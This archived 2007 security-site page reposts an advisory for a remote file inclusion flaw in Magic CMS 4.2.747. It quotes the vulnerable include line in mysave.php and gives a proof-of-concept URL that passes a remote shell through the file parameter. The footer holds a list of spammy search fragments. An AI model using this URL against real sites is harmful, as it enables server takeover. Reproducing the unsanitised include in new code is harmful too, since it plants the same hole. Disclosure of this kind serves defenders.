about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability




2007-03-08 Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability 
Rated as : Moderate Risk

                            \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo---------------------
   | Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
   |        (works only with register_globals = on)        |
   |                     coded by DNX                      |
   ---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes

[!] Background: Magic CMS is an easy to use content 
    management system based on PHP.

[!] Bug: $file in mysave.php line 3 
         
         @include($file."/myconfig.php");
         
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]

[!] Solution: Waiting for patch/update. No response from 
    vendor.

securitydot.net - 2007-03-08

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:27:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
/index2.ph Bart simps sexy gils %...www.ap Bokep local root picturs an Bo-Blog aikan.94be Artis vidi www.trish Apache+Mod sexy+vidoe Bluefilme show video vidio sex www.szyfan pic sexsy www.lalatx iivisadyte Blue+ film E-commerce kuntilanak Blue wallp Jsn Blue Films sex.v netcat dots Blog702.co sexporn www.yuotob maxcpm.inf Blackhills www.sexcli www.yuotob Syscp Free e boo Amisha Pat Black Hook SEXKOREA yangom lo763l Bigboobspa master pas www.youtub TAMIL+SEX+ Bigassarab Bia+2+rap. channaisex